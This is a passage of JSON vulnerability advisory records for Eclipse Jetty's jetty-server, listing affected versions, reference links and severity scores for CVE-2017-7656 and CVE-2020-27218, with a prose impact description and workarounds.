"7.0.0.RC5", "7.0.0.RC6", "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", 
"7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", "8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", 
"9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.25.v20180606", "9.2.26.v20180806", "9.2.27.v20190403", "9.2.28.v20190418", "9.2.29.v20191105", "9.2.3.v20140905", "9.2.30.v20200428", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224", "9.3.0.M0", "9.3.0.M1", "9.3.0.M2", "9.3.0.RC0", "9.3.0.RC1", "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.3.v20150827", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.3.23.v20180228", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-84q7-p226-4x5w/GHSA-84q7-p226-4x5w.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.0" }, { "fixed": "9.4.11.v20180605" } ] } ], "versions": [ "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", 
"9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.10.v20180503", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-84q7-p226-4x5w/GHSA-84q7-p226-4x5w.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7656" }, { "type": "WEB", "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=535667" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-84q7-p226-4x5w" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbf4565a0b63f9c8b07fab29352a97bbffe76ecafed8b8555c15b83c6@%3Cissues.maven.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181014-0001" }, { "type": "WEB", "url": "https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US\u0026docId=emr_na-hpesbst03953en_us" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4278" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1041194" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:24:19Z", "nvd_published_at": "2018-06-26T15:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] 
}, { "schema_version": "1.7.3", "id": "GHSA-86wm-rrjm-8wh8", "published": "2020-12-02T18:28:18Z", "modified": "2024-03-10T05:31:38.566956Z", "aliases": [ "BIT-kafka-2020-27218", "BIT-spark-2020-27218", "CVE-2020-27218" ], "related": [ "CVE-2020-27218" ], "summary": "Buffer not correctly recycled in Gzip Request inflation", "details": "### Impact\nIf GZIP request body inflation is enabled and requests from different clients are multiplexed onto a single connection and if an \nattacker can send a request with a body that is received entirely but not consumed by the application, then a subsequent request\non the same connection will see that body prepended to its body.\n\nThe attacker will not see any data, but may inject data into the body of the subsequent request\n\nCVE score is [4.8 AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L\u0026version=3.1)\n\n### Workarounds\nThe problem can be worked around by either:\n- Disabling compressed request body inflation by GzipHandler.\n- By always fully consuming the request content before sending a response.\n- By adding a `Connection: close` to any response where the servlet does not fully consume request content.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.0" }, { "fixed": "9.4.35.v20201120" } ] } ], "versions": [ "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", 
"9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.33.v20201020", "9.4.34.v20201102", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.34", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/12/GHSA-86wm-rrjm-8wh8/GHSA-86wm-rrjm-8wh8.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-86wm-rrjm-8wh8" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27218" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbbd003149f929b0e2fe58fb315de1658e98377225632e7e4239323fb@%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbbd003149f929b0e2fe58fb315de1658e98377225632e7e4239323fb%40%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rba4bca48d2cdfa8c08afc368a9cc4572ec85a5915ba29b8a194bf505@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rba4bca48d2cdfa8c08afc368a9cc4572ec85a5915ba29b8a194bf505%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb8f413dc923070919b09db3ac87d079a2dcc6f0adfbb029e206a7930@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb8f413dc923070919b09db3ac87d079a2dcc6f0adfbb029e206a7930%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rb6a3866c02ac4446451c7d9dceab2373b6d32fb058f9085c6143de30@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb6a3866c02ac4446451c7d9dceab2373b6d32fb058f9085c6143de30%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb4ca79d1af5237108ce8770b7c46ca78095f62ef21331d9d06142388@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb4ca79d1af5237108ce8770b7c46ca78095f62ef21331d9d06142388%40%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/racf9e6ad2482cb9b1e3e1b2c1b443d9d5cf14055fb54dec3d2dcce91@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/racf9e6ad2482cb9b1e3e1b2c1b443d9d5cf14055fb54dec3d2dcce91%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/racd55c9b704aa68cfb4436f17739b612b5d4f887155e04ed521a4b67@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/racd55c9b704aa68cfb4436f17739b612b5d4f887155e04ed521a4b67%40%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=568892" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbc5a8d7a0a13bc8152d427a7e9097cdeb139c6cfe111b2f00f26d16b%40%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbc5a8d7a0a13bc8152d427a7e9097cdeb139c6cfe111b2f00f26d16b@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbe3f2e0a3c38ed9cbef81507b7cc6e523341865e30dc15c7503adc76%40%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbe3f2e0a3c38ed9cbef81507b7cc6e523341865e30dc15c7503adc76@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rbea4d456d88b043be86739ab0200ad06ba5a7921064411c098f79831%40%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbea4d456d88b043be86739ab0200ad06ba5a7921064411c098f79831@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc0e35f4e8a8a36127e3ae7a67f325a3a6a4dbe05034130fb04b6f3b6%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc0e35f4e8a8a36127e3ae7a67f325a3a6a4dbe05034130fb04b6f3b6@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1de630c6ed9a958d9f811e816d6d8efb6ca94aed0869bc5cda9d7f8%40%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1de630c6ed9a958d9f811e816d6d8efb6ca94aed0869bc5cda9d7f8@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc2b603b7fa7f8dbfe0b3b59a6140b4d66868db3bf4b29d69a772d72a%40%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc2b603b7fa7f8dbfe0b3b59a6140b4d66868db3bf4b29d69a772d72a@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc91c405c08b529b7292c75d9bd497849db700a1297fe3432990f6774%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc91c405c08b529b7292c75d9bd497849db700a1297fe3432990f6774@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8ed14a84656fa0bb8df3bf9373c5be80f47ceac1e2ff068ee734fdb3%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8ed14a84656fa0bb8df3bf9373c5be80f47ceac1e2ff068ee734fdb3@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r8eea4c7797e701f6494c72942dd89f471cda4c2c6e9abbaf05d113d8%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8eea4c7797e701f6494c72942dd89f471cda4c2c6e9abbaf05d113d8@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8f5b144e7a7c2b338f01139d891abbaba12a8173ee01110d21bd0b4d%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8f5b144e7a7c2b338f01139d891abbaba12a8173ee01110d21bd0b4d@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8fee46fd9f1254150cc55eecf1ea6a448fca1f7cf1d1e7f9c4803fdb%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8fee46fd9f1254150cc55eecf1ea6a448fca1f7cf1d1e7f9c4803fdb@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r94230f46b91c364d39922a8ba0cfe12b8dba1556b14792719a7d921f%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r94230f46b91c364d39922a8ba0cfe12b8dba1556b14792719a7d921f@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r942e21ee90e2617a00a08b17b0ac2db961959bec969b91df61584d38%40%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r942e21ee90e2617a00a08b17b0ac2db961959bec969b91df61584d38@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r964d226dd08527fddd7a44410c50daa9d34d398e5c4793f1d7e19da8%40%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r964d226dd08527fddd7a44410c50daa9d34d398e5c4793f1d7e19da8@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r96ef6d20c5bd3d42dab500bac56a427e1dce00cf85b083987617643d%40%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r96ef6d20c5bd3d42dab500bac56a427e1dce00cf85b083987617643d@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r990e0296b188d4530d1053882f687fa4f938f108425db2999a180944%40%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r990e0296b188d4530d1053882f687fa4f938f108425db2999a180944@%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9b46505868794fba04d401956304e63e4d8e39bdc118d30e5e87dcd9%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9b46505868794fba04d401956304e63e4d8e39bdc118d30e5e87dcd9@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9d7a86fb0b45e5b1855d4df83a5820eef813d55eae3edf224f3d5055%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9d7a86fb0b45e5b1855d4df83a5820eef813d55eae3edf224f3d5055@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9f571b086965b35d4e91e47fb67c27b42b62762248b4900ba723599f%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9f571b086965b35d4e91e47fb67c27b42b62762248b4900ba723599f@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra09a653997cbf10aab8c0deabc0fa49f5a8a8ce4305ce9089b98485f%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra09a653997cbf10aab8c0deabc0fa49f5a8a8ce4305ce9089b98485f@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/ra1c234f045871827f73e4d68326b067e72d3139e109207345fa57d9e%40%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra1c234f045871827f73e4d68326b067e72d3139e109207345fa57d9e@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re4ae7ada52c5ecfe805eb86ddc0af399ec8a57bfb0d8c632b8723b88%40%3Cdev.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re4ae7ada52c5ecfe805eb86ddc0af399ec8a57bfb0d8c632b8723b88@%3Cdev.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re4e67541a0a25a8589e89f52f8cd163c863fe04b59e048f9f1a04958%40%3Ccommits.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re4e67541a0a25a8589e89f52f8cd163c863fe04b59e048f9f1a04958@%3Ccommits.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re86a6ba09dc74e709db843e3561ead923c8fd1cba32343656dd8c44b%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re86a6ba09dc74e709db843e3561ead923c8fd1cba32343656dd8c44b@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re9214a4232b7ae204288c283bcee4e39f07da6cc34798e9217ba4eb6%40%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re9214a4232b7ae204288c283bcee4e39f07da6cc34798e9217ba4eb6@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/reb75282901d0969ba6582725ce8672070715d0773f6ff54dedd60156%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/reb75282901d0969ba6582725ce8672070715d0773f6ff54dedd60156@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/ree677ff289ba9a90850f2e3ba7279555df1a170263ba39c5272db236%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ree677ff289ba9a90850f2e3ba7279555df1a170263ba39c5272db236@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf0181750e321518c8afa8001e0529d50a9447714ef4f58d98af57904%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf0181750e321518c8afa8001e0529d50a9447714ef4f58d98af57904@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf273267fa2e49314643af3141cec239f97d41de8a59be4ef7e10c65a%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf273267fa2e49314643af3141cec239f97d41de8a59be4ef7e10c65a@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf31e24700f725ef81bc5a2e0444a60e1f295ed0a54c0098362a7bdfa%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf31e24700f725ef81bc5a2e0444a60e1f295ed0a54c0098362a7bdfa@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfa34d2a3e423421a4a1354cf457edba2ce78cee2d3ebd8aab151a559%40%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfa34d2a3e423421a4a1354cf457edba2ce78cee2d3ebd8aab151a559@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfa8879a713480b206c152334419499e6af0878c36217abcc9ab4f0d1%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfa8879a713480b206c152334419499e6af0878c36217abcc9ab4f0d1@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00045.html" }, { "type": "WEB", "url": 
"https://security.netapp.com/advisory/ntap-20201218-0003" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcbc408088ae99dc3167ea293a562a3a9a7295a20e9a1bfc93e43ae1b%40%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcbc408088ae99dc3167ea293a562a3a9a7295a20e9a1bfc93e43ae1b@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rccc7ba8c51d662e13496df20466d27dbab54d7001e9e7b2f31468a9e%40%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rccc7ba8c51d662e13496df20466d27dbab54d7001e9e7b2f31468a9e@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce9e232a663d8405c003fe83d5c86c27d1ed65561f3690e824717bc4%40%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce9e232a663d8405c003fe83d5c86c27d1ed65561f3690e824717bc4@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcf7b5818f71bb97fd695eb0f54f8f4f69e15cc5f9ec761ea8be0d0d3%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcf7b5818f71bb97fd695eb0f54f8f4f69e15cc5f9ec761ea8be0d0d3@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26%40%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rd20651e102cb6742a9d9322ea7b5fc3ab60a7ffecb50fa9157cbf176%40%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd20651e102cb6742a9d9322ea7b5fc3ab60a7ffecb50fa9157cbf176@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd8e24a3e482e5984bc8c5492dc790413e4fdc1234e3debb94515796b%40%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd8e24a3e482e5984bc8c5492dc790413e4fdc1234e3debb94515796b@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd9a960429741406f6557fa344a13d50a0c9976dac2e4c46bb54b32d7%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd9a960429741406f6557fa344a13d50a0c9976dac2e4c46bb54b32d7@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdbdbb4e51f8857e082b464cd128decd7263cf0fb8557f12993562c56%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdbdbb4e51f8857e082b464cd128decd7263cf0fb8557f12993562c56@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdde0ad0a03eec962c56b46e70e225918ea2368dcc3fd3488741fad53%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdde0ad0a03eec962c56b46e70e225918ea2368dcc3fd3488741fad53@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rde11c433675143d8d27551c3d9e821fe1955f1551a518033d3716553%40%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rde11c433675143d8d27551c3d9e821fe1955f1551a518033d3716553@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
